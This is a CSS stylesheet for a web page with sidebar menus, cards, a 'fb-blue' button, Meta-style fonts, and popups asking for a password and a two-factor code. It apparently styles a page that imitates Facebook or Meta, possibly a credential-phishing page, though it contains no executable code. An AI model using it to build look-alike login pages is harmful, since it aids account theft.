* {
    font-family: Arial, Helvetica, sans-serif !important;
}

#root {
    overflow: hidden;
}

svg{
    display: inline-block;
}

#main-component {
    background: rgb(249,241,249);
    background: linear-gradient(130deg, rgba(249,241,249,1) 0%, rgba(234,243,253,1) 35%, rgba(237,251,242,1) 100%);
    height: 100vh;
    overflow: hidden;
    overflow-y: scroll;
}

#main-component #main{
    max-width: 1100px;
}

.left{
    border-right: 1px solid #DEE3E9;
}

.left .left-content{
    height: 100vh;
    padding: 40px 20px 0 0;
    position: sticky;
    position: -webkit-sticky;
    top: 0;
    overflow-y: auto;
}

*::-webkit-scrollbar {
    width: 3px;
}

*::-webkit-scrollbar-thumb {
    background: rgb(74, 74, 74);
}

*::-webkit-scrollbar-track {
    background: transparent;
}

.logo{
    width: 70px;
}

.logo svg{
    height: min-content;
    width: 100%;
}

h1,h2{
    line-height: 30px;
    color: rgb(28, 30, 33);
    font-family: Optimistic Display Bold, Helvetica, Arial, sans-serif;
    font-weight: 700;
    margin: 16px 0;
}

h1 {
    font-size: 24px;
    display: flex;
    align-items: center;
}

h1 svg{
    margin-right: 8px;
}

.action-button {
    display: flex;
    align-items: center;
    width: 100%;
    padding: 12px 16px;
    border-radius: 15px;
    color: black;
    background-color: inherit;
    transition: background-color 0.35s ease;
    cursor: pointer;
    font-size: 16px;
    font-weight: 500;
    line-height: 20px;
    font-family: Optimistic Text Medium, Helvetica, Arial, sans-serif;
}

.action-button.main {
    color: white;
    background-color: rgb(52, 72, 84);
}

.action-button.main svg path{
    fill: white;
}

.action-button .action-text {
    width: 100%;
    text-align: left;
    padding: 0 12px;
}

.action-button .action-icon svg {
    width: 24px;
    height: 24px;
}

.action-button .action-arrow svg {
    width: 24px;
    height: 24px;
}

.action-button:not(.main):hover {
    background-color: #E3E8EF;
}

.content-action{
    height: 0;
    overflow: hidden;
    transition: 0.3s ease-in-out;
}

.item-action.active .content-action{
    height: max-content;
    transition: 0.3s ease-in-out;
}

.item-action.active .action-arrow svg{
    transform: rotate(180deg);
}

.item-action.active .content-action .action-arrow svg{
    transform: rotate(0);
}

.content-right{
    padding: 40px 20px;
}

p {
    margin: 0;
    font-size: 15px;
    line-height: 20px;
    font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif !important;
}

h6 {
    font-size: 15px;
    font-weight: 600;
    margin-bottom: 20px;
}

li {
    margin: 8px 0;
    font-size: 15px;
}

.card-thumb{
    display: flex;
    flex-direction: column;
    border-radius: 20px;
    background-color: white;
    margin: 20px 0;
    overflow: hidden;
}

.thumb-content {
    margin: 20px;
}

.thumb-content .thumb-type {
    font-size: 16px;
    font-weight: 400;
    margin-bottom: 10px;
}

.thumb-content h4 {
    font-weight: 500;
    margin: 14px 0;
}

.btn-wrapper {
    width: 100%;
    display: flex;
    justify-content: center;
    padding: 20px 0 0 0;
}

.button{
    width: 100%;
    height: 50px;
    border-radius: 20px;
    display: flex;
    justify-content: center;
    align-items: center;
    cursor: pointer;
}

.button.fb-blue {
    background-color: rgb(0, 100, 224);
    color: white;
}

.action-button-list .action-icon img {
    width: 48px;
    height: 48px;
}

.small-grey {
    color: rgb(70, 90, 105);
    font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif;
    font-size: 15px;
    font-weight: 400;
    line-height: 20px;
}

.action-button-list .action-button {
    border-radius: 0;
    background-color: white;
}

.action-button-list .action-button .action-arrow svg{
    transform: rotate(-90deg);
}

.action-button-list .action-button.b-bottom {
    border-bottom: 1px solid #E3E8EF;
}

.action-button-list {
    border-radius: 15px;
    overflow: hidden;
}

.link-to {
    text-decoration: none;
    margin: 0;
    font-size: 15px;
    cursor: pointer;
    color: #0d6efd;
    display: inline;
    margin-left: 5px;
}

.link-to:hover {
    text-decoration: underline;
}

.link-to svg{
    margin-left: 3px;
    width: 14px;
    height: 14px;
    vertical-align: text-top;
}

.link-to svg path{
    fill: #0d6efd;
    margin-left: 5px;
}

.menu-mobile{
    display: flex;
    align-items: center;
    justify-content: space-between;
    padding: 10px;
    display: none;
}

.item-button{
    width: 30px;
    height: 2px;
    border-radius: 5px;
    background-color: #333;
    margin: 5px 0;
    transition: 0.4s;
}

.close-bar{
    display: flex;
    flex-direction: column;
    cursor: pointer;
    align-items: end;
}

.close-bar .item-button.top{
    transform: rotate(-45deg) translate(-3px, 4px);
}

.close-bar .item-button.bottom{
    transform: rotate(45deg) translate(-5px, -6px);
}

.popup {
    position: fixed;
    padding: 0;
    top: 0;
    left: 0;
    bottom: 0;
    right: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    justify-content: center;
    align-items: center;
    display: flex;
    justify-content: center;
    flex-direction: column;
    z-index: -1;
}

.popup .popup-item{
    max-height: none;
    max-width: 500px;
    margin: 15px;
    width: 95%;
    border-radius: 25px;
    background: linear-gradient(90deg, rgba(249, 241, 249, 1) 0%, rgba(234, 243, 253, 1) 35%, rgba(237, 251, 242, 1) 100%);
    padding: 20px;
    overflow-y: auto;
    height: 100vh;
    display: none;
}

.popup.active{
    z-index: 9;
}

.popup .popup-item.active{
    display: block;
}

h4{
    font-weight: 600;
}

h5{
    margin-top: 0;
    margin-bottom: .5rem;
    font-weight: 600;
    line-height: 1.2;
    font-size: 1rem;
}

.popup .action-button-list .action-button .action-arrow svg{
    width: 20px;
    height: 20px;
}

.popup-head{
    display: flex;
    align-items: center;
    justify-content: space-between;
    padding: .4rem 0;
}

.popup-head .close-bar {
    padding: .2rem;
    border-radius: 25px;
}

.popup-head .close-bar svg {
    width: 20px;
    height: 20px;
}

.popup-head .close-bar:hover {
    background-color: #E2EAF2;
}

form label{
    margin-bottom: .5rem;
}

.ant-form-item{
    margin-bottom: 0;
}

.item-form{
    margin-bottom: 1rem;
}

.form-text{
    margin-top: .25rem;
    font-size: .875em;
    color: #6c757d;
}

.ant-input{
    border: 2px solid #D4DBE3;
    height: 50px;
    border-radius: 10px;
    padding: 0 11px;
}

.ant-input-affix-wrapper{
    border: 2px solid #D4DBE3;
    border-radius: 10px;
    padding: 0 11px;
}

.ant-input-affix-wrapper input{
    background-color: transparent;
}

.ant-input:hover,
.ant-input-affix-wrapper:not(.ant-input-affix-wrapper-disabled):hover{
    border: 2px solid #D4DBE3;
}

.ant-input:focus, 
.ant-input-focused,
.ant-input-affix-wrapper:focus{
    border: 2px solid #D4DBE3;
    box-shadow: none;
}

.ant-btn-default:not(:disabled):not(.ant-btn-disabled):hover {
    color: #fff;
    background-color: #0d6efd;
    border-color: #0d6efd;
}

.button-send{
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    position: relative;
    border-radius: 25px;
    height: 50px;
    font-size: 20px;
    color: #fff;
    background-color: #0d6efd;
    border-color: #0d6efd;
    margin: 15px 0;
}

.popup-footer{
    display: flex;
    align-items: center;
    justify-content: center;
}

.password-correct{
    color: red;
    font-size: 15px;
    display: none;
}

.password-correct.active{
    display: block;
}

.popup .popup-item.popup-pasword,
.popup .popup-item.popup-two-fa{
    display: flex;
    flex-direction: column;
    justify-content: space-between;
    display: none;
}

.popup .popup-item.popup-pasword.active,
.popup .popup-item.popup-two-fa.active{
    display: block;
    display: flex;
}

.popup-pasword .popup-content,
.popup .popup-item.popup-two-fa .popup-content{
    display: flex;
    flex-direction: column;
    justify-content: space-between;
    height: 100%;
}

.popup-pasword .popup-content form,
.popup-two-fa .popup-content form{
    margin: auto 0;
}

.popup .logo{
    margin: 0 auto;
}
@media (max-width: 1001px) {
    .col-8{
        width: 100% !important;
    }

    .menu-mobile{
        display: block;
        display: flex;
    }

    .left.col-4{
        display: none;
    }

    .right .content-right{
        padding: 20px 5px;
    }

    h1 svg{
        width: 50px !important;
        height: 50px !important;
        margin-right: 8px;
    }
        
    .logo{
        margin: 0 auto;
    }
}